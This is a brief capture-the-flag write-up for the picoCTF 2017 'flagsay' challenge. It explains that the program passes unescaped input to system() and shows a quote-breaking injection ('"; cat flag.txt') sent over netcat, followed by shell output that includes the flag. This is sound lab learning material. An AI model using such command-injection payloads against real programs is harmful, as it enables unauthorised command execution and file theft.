Looking at the flagsay program, we find that it uses system() to echo the flag.
Since the program doesn't perform any escaping, so we can exploit the program by adding
quotation mark to escape the string (similar to SQL!).

$ nc shell2017.picoctf.com
"; cat flag.txt
			   _
			  //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			 //
035cff8ad48ff541ac4fc0bb271592f8
cat: //: Is a directory
cat: /: Is a directory
sh: 4: //: Permission denied
sh: 5: //: Permission denied
sh: 6: //: Permission denied
sh: 7: //: Permission denied
sh: 8: //: Permission denied
sh: 9: //___________________________________/: not found
sh: 10: //: Permission denied
sh: 11: //: Permission denied
sh: 12: //: Permission denied
sh: 13: //: Permission denied
sh: 14: //: Permission denied
sh: 15: //: Permission denied
sh: 17: Syntax error: Unterminated quoted string
